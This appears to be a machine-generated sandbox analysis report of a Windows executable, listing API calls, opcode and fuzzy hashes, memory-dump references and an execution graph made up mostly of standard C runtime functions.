                                          • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                          • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                          • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                          • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                          APIs
                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                          • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                          • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                          • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFontIndirectItemMessageObjectSend
                                          • String ID:
                                          • API String ID: 2001801573-0
                                          • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                          • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                          • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                          • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                          APIs
                                          • GetParent.USER32(?), ref: 00401BA8
                                          • GetWindowRect.USER32(?,?), ref: 00401BC1
                                          • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                          • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClientScreen$ParentRectWindow
                                          • String ID:
                                          • API String ID: 2099118873-0
                                          • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                          • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                          • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                          • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: _wtol
                                          • String ID: GUIFlags$[G@
                                          • API String ID: 2131799477-2126219683
                                          • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                          • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                          • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                          • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: EnvironmentVariable
                                          • String ID: ?O@
                                          • API String ID: 1431749950-3511380453
                                          • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                          • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                          • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                          • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                          Execution Graph

                                          Execution Coverage:3.1%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:1.6%
                                          Total number of Nodes:1734
                                          Total number of Limit Nodes:37
19502->19509 19506 6fa45992 19503->19506 19511 6fa458c6 _memset 19503->19511 19505 6fa46911 ctype 63 API calls 19504->19505 19508 6fa44ea0 19504->19508 19505->19508 19507 6fa459d8 19506->19507 19510 6fa46dc1 ctype 2 API calls 19506->19510 19514 6fa45ac0 62 API calls 19507->19514 19508->19244 19509->19508 19513 6fa43720 65 API calls 19509->19513 19510->19507 19511->19508 19512 6fa43720 65 API calls 19511->19512 19512->19511 19513->19509 19516 6fa45a0d _memset 19514->19516 19515 6fa45a8e 19517 6fa46911 ctype 63 API calls 19515->19517 19516->19515 19518 6fa43720 65 API calls 19516->19518 19517->19508 19518->19516 19520 6fa46911 ctype 63 API calls 19519->19520 19521 6fa4504b 19520->19521 19521->18626 19524 6fa47696 ctype 19522->19524 19523 6fa47807 19536 6fa477fb 19523->19536 19586 6fa42330 19523->19586 19524->19523 19526 6fa476bd 19524->19526 19543 6fa4748e 19526->19543 19527 6fa53f34 ___strgtold12_l 5 API calls 19529 6fa47835 19527->19529 19529->18629 19536->19527 19620 6fa41440 19537->19620 19539 6fa47312 _memset 19540 6fa46a35 62 API calls 19539->19540 19541 6fa47329 PathStripToRootW 19540->19541 19542 6fa4733d 19541->19542 19542->18631 19544 6fa4749d __EH_prolog3_GS 19543->19544 19545 6fa46dc1 ctype 2 API calls 19544->19545 19546 6fa474c7 GetFullPathNameW 19544->19546 19545->19544 19547 6fa47505 19546->19547 19548 6fa474e0 19546->19548 19550 6fa47524 19547->19550 19551 6fa47509 19547->19551 19593 6fa46a35 19548->19593 19555 6fa472fd 63 API calls 19550->19555 19554 6fa42330 63 API calls 19551->19554 19565 6fa474fe ctype 19551->19565 19552 6fa474ef 19553 6fa4745f 64 API calls 19552->19553 19553->19565 19554->19565 19557 6fa47540 PathIsUNCW 19555->19557 19559 6fa47554 GetVolumeInformationW 19557->19559 19557->19565 19560 6fa47596 19559->19560 19561 6fa47577 19559->19561 19563 6fa475a6 19560->19563 19564 6fa4759f CharUpperW 19560->19564 19562 6fa4745f 64 API calls 19561->19562 19562->19565 19563->19565 19566 6fa475af FindFirstFileW 19563->19566 19564->19563 19599 
6fa551b5 19565->19599 19566->19565 19567 6fa475c7 FindClose 19566->19567 19567->19561 19568 6fa475d7 19567->19568 19568->19561 19569 6fa475df lstrlenW 19568->19569 19570 6fa475fc 19569->19570 19571 6fa4762d 19569->19571 19596 6fa46ea0 19570->19596 19571->19565 19573 6fa42330 63 API calls 19571->19573 19573->19565 19587 6fa4234a 19586->19587 19588 6fa4233b 19586->19588 19591 6fa414a0 ctype 63 API calls 19587->19591 19589 6fa414a0 ctype 63 API calls 19588->19589 19590 6fa42344 19589->19590 19590->19536 19592 6fa42369 19591->19592 19592->19536 19602 6fa544cb 19593->19602 19595 6fa46a4b 19595->19552 19611 6fa551ed 19596->19611 19598 6fa46eb3 19598->19565 19600 6fa53f34 ___strgtold12_l 5 API calls 19599->19600 19601 6fa551bf 19600->19601 19601->19601 19607 6fa544dd 19602->19607 19603 6fa544e1 19604 6fa544e6 19603->19604 19605 6fa55348 __strnicoll_l 62 API calls 19603->19605 19604->19595 19606 6fa544fd 19605->19606 19608 6fa5815c __strnicoll_l 6 API calls 19606->19608 19607->19603 19607->19604 19609 6fa5452d 19607->19609 19608->19604 19609->19604 19610 6fa55348 __strnicoll_l 62 API calls 19609->19610 19610->19606 19612 6fa55205 19611->19612 19613 6fa551fe 19611->19613 19614 6fa55348 __strnicoll_l 62 API calls 19612->19614 19613->19612 19618 6fa55231 19613->19618 19615 6fa5520a 19614->19615 19616 6fa5815c __strnicoll_l 6 API calls 19615->19616 19617 6fa55219 19616->19617 19617->19598 19618->19617 19619 6fa55348 __strnicoll_l 62 API calls 19618->19619 19619->19615 19621 6fa41465 19620->19621 19622 6fa4145d 19620->19622 19621->19539 19623 6fa413f0 ctype 62 API calls 19622->19623 19623->19621 19625 6fa47bd6 ctype 19624->19625 19626 6fa47bea 19624->19626 19628 6fa47b85 19625->19628 19626->18637 19629 6fa47b91 __EH_prolog3 19628->19629 19630 6fa468e2 ctype 62 API calls 19629->19630 19631 6fa47b98 19630->19631 19632 6fa47bb5 19631->19632 19633 6fa42370 ctype 63 API calls 19631->19633 19634 6fa5527b __CxxThrowException@8 RaiseException 19632->19634 19633->19632 19636 6fa47bca 
ctype 19634->19636 19635 6fa47bea 19635->19626 19636->19635 19637 6fa47b85 ctype 64 API calls 19636->19637 19637->19635 19639 6fa41580 62 API calls 19638->19639 19640 6fa42f92 19639->19640 19641 6fa413f0 ctype 62 API calls 19640->19641 19642 6fa42fc2 __wcsrev 19640->19642 19641->19642 19643 6fa42f60 62 API calls 19642->19643 19644 6fa42fe0 _wcspbrk 19642->19644 19645 6fa4309f 19643->19645 19644->18642 19646 6fa430a7 19645->19646 19647 6fa430bc 19645->19647 19648 6fa43370 62 API calls 19646->19648 19649 6fa41580 62 API calls 19647->19649 19650 6fa430b8 19648->19650 19651 6fa430c7 19649->19651 19650->18642 19651->18642 19653 6fa43386 19652->19653 19654 6fa43391 19653->19654 19657 6fa433af ctype 19653->19657 19655 6fa41580 62 API calls 19654->19655 19656 6fa4339a 19655->19656 19656->18647 19665 6fa43680 19657->19665 19662 6fa4158f ctype 19660->19662 19661 6fa4159c 19661->18648 19662->19661 19663 6fa53f43 _memcpy_s 62 API calls 19662->19663 19664 6fa415e1 19663->19664 19664->18648 19666 6fa4368b ctype 19665->19666 19667 6fa53f43 _memcpy_s 62 API calls 19666->19667 19668 6fa433e6 19667->19668 19668->18647 19670 6fa4340e 19669->19670 19671 6fa4341f 19669->19671 19678 6fa428d0 LoadResource 19670->19678 19671->18654 19673 6fa43416 19673->19671 19674 6fa43447 19673->19674 19675 6fa413f0 ctype 62 API calls 19673->19675 19676 6fa53f43 _memcpy_s 62 API calls 19674->19676 19675->19674 19677 6fa4347e 19676->19677 19677->18654 19679 6fa428e6 19678->19679 19680 6fa428e9 LockResource 19678->19680 19679->19673 19681 6fa4290a 19680->19681 19682 6fa428f7 SizeofResource 19680->19682 19681->19673 19682->19681 19684 6fa4124c 19683->19684 19691 6fa54320 19684->19691 19687 6fa41286 19694 6fa541a0 19687->19694 19688 6fa413f0 ctype 62 API calls 19688->19687 19690 6fa41294 19690->18671 19697 6fa542c9 19691->19697 19703 6fa54115 19694->19703 19698 6fa542d9 19697->19698 19701 6fa41263 19697->19701 19699 6fa55348 __strnicoll_l 62 API calls 19698->19699 19700 6fa542de 19699->19700 19702 6fa5815c 
__strnicoll_l 6 API calls 19700->19702 19701->19687 19701->19688 19702->19701 19704 6fa54122 19703->19704 19705 6fa5413f 19703->19705 19706 6fa55348 __strnicoll_l 62 API calls 19704->19706 19707 6fa5414c 19705->19707 19709 6fa54159 19705->19709 19708 6fa54127 19706->19708 19710 6fa55348 __strnicoll_l 62 API calls 19707->19710 19711 6fa5815c __strnicoll_l 6 API calls 19708->19711 19718 6fa5401d 19709->19718 19712 6fa54151 19710->19712 19716 6fa54137 19711->19716 19715 6fa5815c __strnicoll_l 6 API calls 19712->19715 19715->19716 19716->19690 19717 6fa55348 __strnicoll_l 62 API calls 19717->19712 19719 6fa5404d 19718->19719 19720 6fa5402d 19718->19720 19721 6fa5407d 19719->19721 19723 6fa5405d 19719->19723 19722 6fa55348 __strnicoll_l 62 API calls 19720->19722 19729 6fa540c4 19721->19729 19731 6fa54042 19721->19731 19733 6fa584f5 19721->19733 19724 6fa54032 19722->19724 19725 6fa55348 __strnicoll_l 62 API calls 19723->19725 19726 6fa5815c __strnicoll_l 6 API calls 19724->19726 19727 6fa54062 19725->19727 19726->19731 19728 6fa5815c __strnicoll_l 6 API calls 19727->19728 19728->19731 19729->19731 19732 6fa584f5 __flsbuf 96 API calls 19729->19732 19731->19716 19731->19717 19732->19731 19754 6fa5fbb6 19733->19754 19736 6fa58527 19739 6fa58538 __flsbuf 19736->19739 19740 6fa5852b 19736->19740 19737 6fa58510 19738 6fa55348 __strnicoll_l 62 API calls 19737->19738 19742 6fa58515 19738->19742 19739->19742 19750 6fa5858e 19739->19750 19753 6fa58599 19739->19753 19760 6fa5f99d 19739->19760 19741 6fa55348 __strnicoll_l 62 API calls 19740->19741 19741->19742 19742->19729 19743 6fa58628 19745 6fa5f878 __locking 96 API calls 19743->19745 19744 6fa585a8 19746 6fa585bf 19744->19746 19749 6fa585dc 19744->19749 19745->19742 19772 6fa5f878 19746->19772 19749->19742 19797 6fa5f02c 19749->19797 19750->19753 19769 6fa5f954 19750->19769 19753->19743 19753->19744 19755 6fa5fbc5 19754->19755 19757 6fa58505 19754->19757 19756 6fa55348 __strnicoll_l 62 API calls 19755->19756 19758 6fa5fbca 
19756->19758 19757->19736 19757->19737 19759 6fa5815c __strnicoll_l 6 API calls 19758->19759 19759->19757 19761 6fa5f9b9 19760->19761 19762 6fa5f9aa 19760->19762 19765 6fa5f9dd 19761->19765 19766 6fa55348 __strnicoll_l 62 API calls 19761->19766 19763 6fa55348 __strnicoll_l 62 API calls 19762->19763 19764 6fa5f9af 19763->19764 19764->19750 19765->19750 19767 6fa5f9cd 19766->19767 19768 6fa5815c __strnicoll_l 6 API calls 19767->19768 19768->19765 19770 6fa5a5c3 __malloc_crt 62 API calls 19769->19770 19771 6fa5f969 19770->19771 19771->19753 19773 6fa5f884 __freefls@4 19772->19773 19774 6fa5f8a7 19773->19774 19775 6fa5f88c 19773->19775 19776 6fa5f8b5 19774->19776 19781 6fa5f8f6 19774->19781 19829 6fa5535b 19775->19829 19778 6fa5535b __locking 62 API calls 19776->19778 19780 6fa5f8ba 19778->19780 19784 6fa55348 __strnicoll_l 62 API calls 19780->19784 19832 6fa619c1 19781->19832 19782 6fa55348 __strnicoll_l 62 API calls 19783 6fa5f899 __freefls@4 19782->19783 19783->19742 19786 6fa5f8c1 19784->19786 19788 6fa5815c __strnicoll_l 6 API calls 19786->19788 19787 6fa5f8fc 19789 6fa5f91f 19787->19789 19790 6fa5f909 19787->19790 19788->19783 19792 6fa55348 __strnicoll_l 62 API calls 19789->19792 19842 6fa5f145 19790->19842 19794 6fa5f924 19792->19794 19793 6fa5f917 19901 6fa5f94a 19793->19901 19795 6fa5535b __locking 62 API calls 19794->19795 19795->19793 19798 6fa5f038 __freefls@4 19797->19798 19799 6fa5f065 19798->19799 19800 6fa5f049 19798->19800 19802 6fa5f073 19799->19802 19804 6fa5f094 19799->19804 19801 6fa5535b __locking 62 API calls 19800->19801 19803 6fa5f04e 19801->19803 19805 6fa5535b __locking 62 API calls 19802->19805 19808 6fa55348 __strnicoll_l 62 API calls 19803->19808 19806 6fa5f0b4 19804->19806 19807 6fa5f0da 19804->19807 19809 6fa5f078 19805->19809 19810 6fa5535b __locking 62 API calls 19806->19810 19811 6fa619c1 ___lock_fhandle 63 API calls 19807->19811 19821 6fa5f056 __freefls@4 19808->19821 19812 6fa55348 __strnicoll_l 62 API calls 19809->19812 19813 
6fa5f0b9 19810->19813 19814 6fa5f0e0 19811->19814 19815 6fa5f07f 19812->19815 19816 6fa55348 __strnicoll_l 62 API calls 19813->19816 19817 6fa5f0ed 19814->19817 19818 6fa5f109 19814->19818 19819 6fa5815c __strnicoll_l 6 API calls 19815->19819 19820 6fa5f0c0 19816->19820 19822 6fa5efa7 __lseeki64_nolock 64 API calls 19817->19822 19823 6fa55348 __strnicoll_l 62 API calls 19818->19823 19819->19821 19824 6fa5815c __strnicoll_l 6 API calls 19820->19824 19821->19742 19825 6fa5f0fe 19822->19825 19826 6fa5f10e 19823->19826 19824->19821 19948 6fa5f13b 19825->19948 19827 6fa5535b __locking 62 API calls 19826->19827 19827->19825 19830 6fa5a206 __getptd_noexit 62 API calls 19829->19830 19831 6fa55360 19830->19831 19831->19782 19833 6fa619cd __freefls@4 19832->19833 19834 6fa61a28 19833->19834 19835 6fa5a914 __lock 62 API calls 19833->19835 19836 6fa61a2d EnterCriticalSection 19834->19836 19837 6fa61a4a __freefls@4 19834->19837 19838 6fa619f9 19835->19838 19836->19837 19837->19787 19839 6fa61a10 19838->19839 19840 6fa5e1d3 __ioinit InitializeCriticalSectionAndSpinCount 19838->19840 19904 6fa61a58 19839->19904 19840->19839 19843 6fa5f154 __write_nolock 19842->19843 19844 6fa5f186 19843->19844 19845 6fa5f1ad 19843->19845 19875 6fa5f17b 19843->19875 19847 6fa5535b __locking 62 API calls 19844->19847 19848 6fa5f215 19845->19848 19849 6fa5f1ef 19845->19849 19846 6fa53f34 ___strgtold12_l 5 API calls 19850 6fa5f876 19846->19850 19851 6fa5f18b 19847->19851 19853 6fa5f229 19848->19853 19908 6fa5efa7 19848->19908 19852 6fa5535b __locking 62 API calls 19849->19852 19850->19793 19854 6fa55348 __strnicoll_l 62 API calls 19851->19854 19855 6fa5f1f4 19852->19855 19858 6fa5f99d __flsbuf 62 API calls 19853->19858 19857 6fa5f192 19854->19857 19859 6fa55348 __strnicoll_l 62 API calls 19855->19859 19860 6fa5815c __strnicoll_l 6 API calls 19857->19860 19861 6fa5f234 19858->19861 19862 6fa5f1fd 19859->19862 19860->19875 19863 6fa5f4da 19861->19863 19918 6fa5a27f 19861->19918 19864 6fa5815c 
__strnicoll_l 6 API calls 19862->19864 19866 6fa5f7a9 WriteFile 19863->19866 19867 6fa5f4ea 19863->19867 19864->19875 19870 6fa5f4bc 19866->19870 19871 6fa5f7dc GetLastError 19866->19871 19868 6fa5f5c8 19867->19868 19890 6fa5f4fe 19867->19890 19888 6fa5f6a8 19868->19888 19893 6fa5f5d7 19868->19893 19872 6fa5f827 19870->19872 19870->19875 19877 6fa5f7fa 19870->19877 19871->19870 19872->19875 19876 6fa55348 __strnicoll_l 62 API calls 19872->19876 19873 6fa5f27a 19873->19863 19874 6fa5f28c GetConsoleCP 19873->19874 19874->19870 19899 6fa5f2af 19874->19899 19875->19846 19879 6fa5f84a 19876->19879 19881 6fa5f805 19877->19881 19882 6fa5f819 19877->19882 19878 6fa5f56c WriteFile 19878->19871 19878->19890 19886 6fa5535b __locking 62 API calls 19879->19886 19880 6fa5f70e WideCharToMultiByte 19880->19871 19883 6fa5f745 WriteFile 19880->19883 19887 6fa55348 __strnicoll_l 62 API calls 19881->19887 19926 6fa5536e 19882->19926 19883->19888 19889 6fa5f77c GetLastError 19883->19889 19884 6fa5f64c WriteFile 19884->19871 19884->19893 19886->19875 19891 6fa5f80a 19887->19891 19888->19870 19888->19872 19888->19880 19888->19883 19889->19888 19890->19870 19890->19872 19890->19878 19892 6fa5535b __locking 62 API calls 19891->19892 19892->19875 19893->19870 19893->19872 19893->19884 19895 6fa60932 74 API calls __fassign 19895->19899 19896 6fa5f35b WideCharToMultiByte 19896->19870 19897 6fa5f38c WriteFile 19896->19897 19897->19871 19897->19899 19898 6fa61a88 11 API calls __putwch_nolock 19898->19899 19899->19870 19899->19871 19899->19895 19899->19896 19899->19898 19900 6fa5f3e0 WriteFile 19899->19900 19923 6fa60984 19899->19923 19900->19871 19900->19899 19947 6fa61a61 LeaveCriticalSection 19901->19947 19903 6fa5f952 19903->19783 19907 6fa5a83a LeaveCriticalSection 19904->19907 19906 6fa61a5f 19906->19834 19907->19906 19931 6fa6194a 19908->19931 19910 6fa5efc5 19911 6fa5efcd 19910->19911 19912 6fa5efde SetFilePointer 19910->19912 19914 6fa55348 __strnicoll_l 62 API calls 19911->19914 19913 
6fa5eff6 GetLastError 19912->19913 19916 6fa5efd2 19912->19916 19915 6fa5f000 19913->19915 19913->19916 19914->19916 19917 6fa5536e __dosmaperr 62 API calls 19915->19917 19916->19853 19917->19916 19919 6fa5a206 __getptd_noexit 62 API calls 19918->19919 19920 6fa5a287 19919->19920 19921 6fa5a294 GetConsoleMode 19920->19921 19922 6fa55bff __amsg_exit 62 API calls 19920->19922 19921->19863 19921->19873 19922->19921 19944 6fa6094c 19923->19944 19927 6fa5535b __locking 62 API calls 19926->19927 19928 6fa55379 __dosmaperr 19927->19928 19929 6fa55348 __strnicoll_l 62 API calls 19928->19929 19930 6fa5538c 19929->19930 19930->19875 19932 6fa61957 19931->19932 19933 6fa6196f 19931->19933 19934 6fa5535b __locking 62 API calls 19932->19934 19936 6fa5535b __locking 62 API calls 19933->19936 19943 6fa619b4 19933->19943 19935 6fa6195c 19934->19935 19937 6fa55348 __strnicoll_l 62 API calls 19935->19937 19938 6fa6199d 19936->19938 19939 6fa61964 19937->19939 19940 6fa55348 __strnicoll_l 62 API calls 19938->19940 19939->19910 19941 6fa619a4 19940->19941 19942 6fa5815c __strnicoll_l 6 API calls 19941->19942 19942->19943 19943->19910 19945 6fa58659 _LocaleUpdate::_LocaleUpdate 72 API calls 19944->19945 19946 6fa6095f 19945->19946 19946->19899 19947->19903 19951 6fa61a61 LeaveCriticalSection 19948->19951 19950 6fa5f143 19950->19821 19951->19950 19954 6fa47352 __EH_prolog3_catch_GS 19952->19954 19953 6fa47381 ctype 19958 6fa551c4 19953->19958 19954->19953 19955 6fa47202 ctype 66 API calls 19954->19955 19955->19953 19959 6fa53f34 ___strgtold12_l 5 API calls 19958->19959 19960 6fa551ce 19959->19960 19960->19960 19961 6fa672b3 19964 6fa48495 19961->19964 19965 6fa4aef1 ctype 31 API calls 19964->19965 19966 6fa484a0 19965->19966 19967 6fa4c220 ctype 7 API calls 19966->19967 19968 6fa484a9 19967->19968 19969 6fa4bbbf ctype 2 API calls 19968->19969 19970 6fa484b4 19969->19970 19971 6fa4c292 ctype 3 API calls 19970->19971 19972 6fa484bb 19971->19972 19973 6fa5498c 19974 6fa54997 19973->19974 
19975 6fa5499c 19973->19975 19991 6fa5be02 19974->19991 19979 6fa54896 19975->19979 19978 6fa549aa 19981 6fa548a2 __freefls@4 19979->19981 19980 6fa548ef 19989 6fa5493f __freefls@4 19980->19989 20042 6fa46894 19980->20042 19981->19980 19981->19989 19995 6fa54761 19981->19995 19985 6fa5491f 19987 6fa54761 __CRT_INIT@12 155 API calls 19985->19987 19985->19989 19986 6fa46894 ___DllMainCRTStartup 31 API calls 19988 6fa54916 19986->19988 19987->19989 19990 6fa54761 __CRT_INIT@12 155 API calls 19988->19990 19989->19978 19990->19985 19992 6fa5be34 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 19991->19992 19993 6fa5be27 19991->19993 19994 6fa5be2b 19992->19994 19993->19992 19993->19994 19994->19975 19996 6fa54770 19995->19996 19997 6fa547ec 19995->19997 20046 6fa5a6f4 HeapCreate 19996->20046 19999 6fa54823 19997->19999 20000 6fa547f2 19997->20000 20001 6fa54881 19999->20001 20002 6fa54828 19999->20002 20005 6fa5480d 20000->20005 20031 6fa5477b 20000->20031 20179 6fa55e85 20000->20179 20001->20031 20182 6fa5a3c8 20001->20182 20004 6fa5a0ae ___set_flsgetvalue 8 API calls 20002->20004 20007 6fa5482d 20004->20007 20012 6fa5b77d __ioterm 63 API calls 20005->20012 20005->20031 20010 6fa5a608 __calloc_crt 62 API calls 20007->20010 20013 6fa54839 20010->20013 20011 6fa54787 __RTC_Initialize 20019 6fa54797 GetCommandLineA 20011->20019 20035 6fa5478b 20011->20035 20014 6fa54817 20012->20014 20017 6fa5a033 __decode_pointer 6 API calls 20013->20017 20013->20031 20016 6fa5a0e2 __mtterm 65 API calls 20014->20016 20018 6fa5481c 20016->20018 20024 6fa54857 20017->20024 20021 6fa5a724 __heap_term 4 API calls 20018->20021 20082 6fa5bafe 20019->20082 20021->20031 20026 6fa54875 20024->20026 20027 6fa5485e 20024->20027 20025 6fa547b1 20029 6fa547b5 20025->20029 20123 6fa5ba43 20025->20123 20028 6fa54618 __freebuf 62 API calls 20026->20028 20030 6fa5a11f __mtinit 62 API calls 20027->20030 20028->20031 20163 6fa5a0e2 20029->20163 20034 
6fa54865 GetCurrentThreadId 20030->20034 20031->19980 20034->20031 20157 6fa5a724 20035->20157 20037 6fa547d5 20037->20031 20174 6fa5b77d 20037->20174 20043 6fa468a2 20042->20043 20044 6fa467cb 20042->20044 20043->20044 20045 6fa4aef1 ctype 31 API calls 20043->20045 20044->19985 20044->19986 20045->20044 20047 6fa54776 20046->20047 20047->20031 20048 6fa5a436 GetModuleHandleW 20047->20048 20049 6fa5a451 20048->20049 20050 6fa5a44a 20048->20050 20052 6fa5a5b9 20049->20052 20053 6fa5a45b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 20049->20053 20051 6fa55bcf __crt_waiting_on_module_handle 2 API calls 20050->20051 20054 6fa5a450 20051->20054 20056 6fa5a0e2 __mtterm 65 API calls 20052->20056 20055 6fa5a4a4 TlsAlloc 20053->20055 20054->20049 20058 6fa5a5be 20055->20058 20059 6fa5a4f2 TlsSetValue 20055->20059 20056->20058 20058->20011 20059->20058 20060 6fa5a503 20059->20060 20193 6fa55e94 20060->20193 20063 6fa59fb8 __encode_pointer 6 API calls 20064 6fa5a513 20063->20064 20065 6fa59fb8 __encode_pointer 6 API calls 20064->20065 20066 6fa5a523 20065->20066 20067 6fa59fb8 __encode_pointer 6 API calls 20066->20067 20068 6fa5a533 20067->20068 20069 6fa59fb8 __encode_pointer 6 API calls 20068->20069 20070 6fa5a543 20069->20070 20200 6fa5a798 20070->20200 20073 6fa5a033 __decode_pointer 6 API calls 20074 6fa5a564 20073->20074 20074->20052 20075 6fa5a608 __calloc_crt 62 API calls 20074->20075 20076 6fa5a57d 20075->20076 20076->20052 20077 6fa5a033 __decode_pointer 6 API calls 20076->20077 20078 6fa5a597 20077->20078 20078->20052 20079 6fa5a59e 20078->20079 20080 6fa5a11f __mtinit 62 API calls 20079->20080 20081 6fa5a5a6 GetCurrentThreadId 20080->20081 20081->20058 20083 6fa5bb1c GetEnvironmentStringsW 20082->20083 20084 6fa5bb3b 20082->20084 20085 6fa5bb24 20083->20085 20086 6fa5bb30 GetLastError 20083->20086 20084->20085 20087 6fa5bbd4 20084->20087 20089 6fa5bb57 GetEnvironmentStringsW 20085->20089 20090 6fa5bb66 WideCharToMultiByte 20085->20090 20086->20084 
20088 6fa5bbdd GetEnvironmentStrings 20087->20088 20091 6fa547a7 20087->20091 20088->20091 20092 6fa5bbed 20088->20092 20089->20090 20089->20091 20095 6fa5bbc9 FreeEnvironmentStringsW 20090->20095 20096 6fa5bb9a 20090->20096 20108 6fa5b529 20091->20108 20097 6fa5a5c3 __malloc_crt 62 API calls 20092->20097 20095->20091 20098 6fa5a5c3 __malloc_crt 62 API calls 20096->20098 20099 6fa5bc07 20097->20099 20100 6fa5bba0 20098->20100 20101 6fa5bc0e FreeEnvironmentStringsA 20099->20101 20102 6fa5bc1a ___crtGetEnvironmentStringsA 20099->20102 20100->20095 20103 6fa5bba8 WideCharToMultiByte 20100->20103 20101->20091 20105 6fa5bc24 FreeEnvironmentStringsA 20102->20105 20104 6fa5bbba 20103->20104 20107 6fa5bbc2 20103->20107 20106 6fa54618 __freebuf 62 API calls 20104->20106 20105->20091 20106->20107 20107->20095 20207 6fa553bc 20108->20207 20110 6fa5b535 GetStartupInfoA 20111 6fa5a608 __calloc_crt 62 API calls 20110->20111 20119 6fa5b556 20111->20119 20112 6fa5b774 __freefls@4 20112->20025 20113 6fa5b63e 20113->20112 20115 6fa5b6bb 20113->20115 20120 6fa5b667 GetFileType 20113->20120 20122 6fa5e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20113->20122 20114 6fa5b6f1 GetStdHandle 20114->20115 20115->20112 20115->20114 20117 6fa5b756 SetHandleCount 20115->20117 20118 6fa5b703 GetFileType 20115->20118 20121 6fa5e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20115->20121 20116 6fa5a608 __calloc_crt 62 API calls 20116->20119 20117->20112 20118->20115 20119->20112 20119->20113 20119->20115 20119->20116 20120->20113 20121->20115 20122->20113 20124 6fa5ba5d GetModuleFileNameA 20123->20124 20125 6fa5ba58 20123->20125 20126 6fa5ba84 20124->20126 20214 6fa602ad 20125->20214 20208 6fa5b8a9 20126->20208 20130 6fa547c1 20130->20037 20136 6fa5b7cb 20130->20136 20131 6fa5bac0 20132 6fa5a5c3 __malloc_crt 62 API calls 20131->20132 20133 6fa5bac6 